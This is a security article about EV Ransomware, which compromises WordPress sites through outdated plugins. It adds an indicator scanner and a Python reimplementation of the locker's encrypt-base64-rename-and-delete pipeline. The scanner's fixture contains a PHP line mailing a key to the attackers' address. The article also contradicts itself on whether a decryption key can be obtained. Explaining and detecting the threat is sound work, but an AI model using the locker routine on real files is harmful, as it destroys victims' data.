EV Ransomware Puts WordPress Websites in Its Crosshairs

Ransomware has been particularly active in 2017. It is usually described as a Trojan that lands on a victim's computer, encrypts their files and demands payment for the decryption key. That description does not always hold, though. The ransomware discussed here is a less common variety of this highly dangerous threat and is thought to originate from Indonesia.

How EV Ransomware Infects WordPress Sites

The new threat goes by the name EV Ransomware. What sets it apart is that instead of targeting the files on a single computer, it goes after websites running WordPress. Its operators exploit vulnerabilities in plugins, usually outdated ones, and use that foothold to obtain administrator credentials and reach the server. From there it is easy: the EV payload is dropped onto the server and the site is infected.

Encryption does not start on its own. Once the payload is in place, the operators have to run the file-locker manually and supply the key that will be used to encrypt the targeted data. When that is done, the locker emails its authors the details of the victim, including the domain name, the address and the encryption key that was used. The message goes to htaccess12@gmail.com, the attackers' mailbox. Every encrypted file is given a ".EV" extension.

The decrypter appears to be implemented in the files the ransomware drops. The victim finds the ransom note as a PHP file named "EV.php" in the root directory of the WordPress installation. Loading that page prompts them to pay 0.2 Bitcoin (roughly $900 at the time) for a decryption key that is then to be entered on the compromised site to start decrypting the files.
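The artefacts described above (".EV" files, an EV.php in the site root, and the attackers' mailbox hard-coded in the locker) are enough to triage a server. The following scanner is an added example written for this article, not code from the ransomware or from any WordPress project; it walks a document root and reports those three indicators. The directory layout, file names and the `scan_webroot` / `build_sample_site` helpers are my own, and the sample site it builds is constructed data, so the script runs offline.

```python
"""Triage a WordPress document root for the EV ransomware indicators named in
the article. Added example, not the malware's or WordPress's code."""
import tempfile
from pathlib import Path

# Indicators from the article: the ".EV" suffix on encrypted files, the ransom
# page EV.php in the WordPress root, and the mailbox the locker reports to.
ENCRYPTED_SUFFIX = ".EV"
RANSOM_NOTE = "EV.php"
ATTACKER_MAILBOX = b"htaccess12@gmail.com"


def scan_webroot(root):
    """Return findings: encrypted files, ransom note path, and PHP files that
    reference the attacker mailbox (a likely copy of the locker itself)."""
    root = Path(root)
    findings = {"encrypted": [], "ransom_note": None, "suspect_php": []}
    note = root / RANSOM_NOTE
    if note.is_file():
        findings["ransom_note"] = str(note)
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        if path.name.endswith(ENCRYPTED_SUFFIX):
            findings["encrypted"].append(str(path.relative_to(root)))
        elif path.suffix.lower() == ".php":
            # Read bytes so a mis-encoded or binary-ish file cannot abort the scan.
            if ATTACKER_MAILBOX in path.read_bytes():
                findings["suspect_php"].append(str(path.relative_to(root)))
    findings["encrypted"].sort()
    findings["suspect_php"].sort()
    return findings


def build_sample_site():
    """Construct a small fake WordPress tree (sample data, not a real site)."""
    root = Path(tempfile.mkdtemp(prefix="wp-ev-"))
    (root / "wp-content" / "uploads").mkdir(parents=True)
    (root / "wp-content" / "plugins" / "old-plugin").mkdir(parents=True)
    # One encrypted upload, one untouched file, the ransom page, and a dropped
    # locker that mails the key to the attackers.
    (root / "wp-content" / "uploads" / "report.pdf.EV").write_bytes(b"Zm9v")
    (root / "wp-config.php").write_text("<?php // untouched config\n")
    (root / "EV.php").write_text("<?php // ransom page placeholder\n")
    (root / "wp-content" / "plugins" / "old-plugin" / "ev.php").write_text(
        "<?php mail('htaccess12@gmail.com', 'EV', 'key');\n")
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for name, value in scan_webroot(site).items():
        print(name, value)
```

Run it against a real site as `scan_webroot("/var/www/html")`. A hit on `suspect_php` is the most useful result: that file is the locker, and it is the place to look for the key-handling code and for the address the key was mailed to.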

Encryption Method

The encryption routine EV Ransomware relies on is short but, as far as recovery by the victim is concerned, effective. When the attack starts, the locker takes the key the attacker supplied and hashes it with SHA-256; the hash becomes the key for the actual encryption step. Note what this does and does not achieve: hashing adds nothing to the strength of the encryption, it only turns an arbitrary string into a fixed-size key. What makes decryption a nearly impossible task for the victim is that the key itself is known only to the operator, who receives it by email, and nothing on the server allows it to be recovered. Once a file's contents have been encrypted, the result is base64-encoded and written out as the encrypted version of the file, and the new file gets the ".EV" extension appended to its name.
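To make the pipeline concrete (SHA-256 of the operator's key, encrypt, base64, rename to ".EV") here is an added example that reimplements that flow in Python. It is my own code, not the malware's, and it makes two assumptions the article does not cover: the article never names the cipher, so a counter-mode keystream built from SHA-256 stands in for it, and a per-file random nonce is added so the stand-in is at least not keystream-reusing. The function names (`derive_key`, `encrypt_file`, `decrypt_file`, `roundtrip_demo`) and the sample upload are mine.

```python
"""Reimplementation of the file-handling flow the article describes.
Added example, not the ransomware's code. Cipher and nonce are assumptions."""
import base64
import hashlib
import os
import tempfile
from pathlib import Path

SUFFIX = ".EV"


def derive_key(attacker_key: str) -> bytes:
    # The only key-derivation step the article mentions: a plain SHA-256 of the
    # key the operator typed in. No salt, no iteration count; it just gives a
    # fixed-size key. Secrecy rests entirely on the operator's input string.
    return hashlib.sha256(attacker_key.encode()).digest()


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Stand-in cipher (assumption): counter-mode keystream from
    SHA-256(key || nonce || counter). XOR is self-inverse, so the same call
    encrypts and decrypts."""
    out = bytearray()
    for block, off in enumerate(range(0, len(data), 32)):
        ks = hashlib.sha256(key + nonce + block.to_bytes(8, "big")).digest()
        out.extend(a ^ b for a, b in zip(data[off:off + 32], ks))
    return bytes(out)


def encrypt_file(path: Path, attacker_key: str) -> Path:
    """Encrypt, base64-encode, write <name>.EV and remove the original."""
    key = derive_key(attacker_key)
    nonce = os.urandom(16)          # assumption: not described in the article
    body = keystream_xor(key, nonce, path.read_bytes())
    target = path.with_name(path.name + SUFFIX)
    target.write_bytes(base64.b64encode(nonce + body))
    path.unlink()
    return target


def decrypt_file(path: Path, attacker_key: str) -> Path:
    """Reverse the pipeline: base64-decode, decrypt, strip the .EV suffix."""
    key = derive_key(attacker_key)
    raw = base64.b64decode(path.read_bytes())
    nonce, body = raw[:16], raw[16:]
    original = path.with_name(path.name[:-len(SUFFIX)])
    original.write_bytes(keystream_xor(key, nonce, body))
    return original


def roundtrip_demo():
    """Encrypt a constructed sample upload, then show that only the operator's
    key recovers it. Returns the intermediate values so they can be checked."""
    root = Path(tempfile.mkdtemp(prefix="ev-demo-"))
    sample = root / "wp-content" / "uploads" / "invoice.txt"
    sample.parent.mkdir(parents=True)
    plaintext = b"Constructed sample upload, not real customer data.\n"
    sample.write_bytes(plaintext)
    ev = encrypt_file(sample, "operator-secret")
    stored = ev.read_bytes()
    # A wrong key yields garbage rather than an error: there is no integrity
    # check, so a victim cannot even tell a near-miss from a wrong guess.
    raw = base64.b64decode(stored)
    wrong = keystream_xor(derive_key("wrong-guess"), raw[:16], raw[16:])
    recovered = decrypt_file(ev, "operator-secret").read_bytes()
    return {"plaintext": plaintext, "ev_name": ev.name, "stored": stored,
            "wrong_key": wrong, "recovered": recovered}


if __name__ == "__main__":
    result = roundtrip_demo()
    print(result["ev_name"], result["stored"][:40], result["recovered"] == result["plaintext"])
```

The point of the demo is the asymmetry: with the operator's key the decryption is a few lines, without it the ".EV" file is just base64 of pseudo-random bytes, and SHA-256 plays no part in that difficulty. For a real incident, the file's first bytes after base64-decoding and the locker's own source are what tell you which cipher was actually used.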

No Way to Decrypt Your Files

If EV Ransomware has hit your site, do not bother paying the ransom. Paying is never a good option, and in this case the authors do not even have a working mechanism to hand you a decryption key. Recovery therefore means restoring the site from a backup, so always keep copies of your important files somewhere the server cannot reach, such as an offline hard drive. After restoring, close the way in: update or remove the vulnerable plugin and change the administrator credentials the attackers obtained. Keeping all your WordPress plugins up to date reduces the risk of infection in the same way that keeping the software on your computer up to date does. Constantly updating apps and plugins is tedious, but neglecting it means risking having to deal with pests such as EV Ransomware.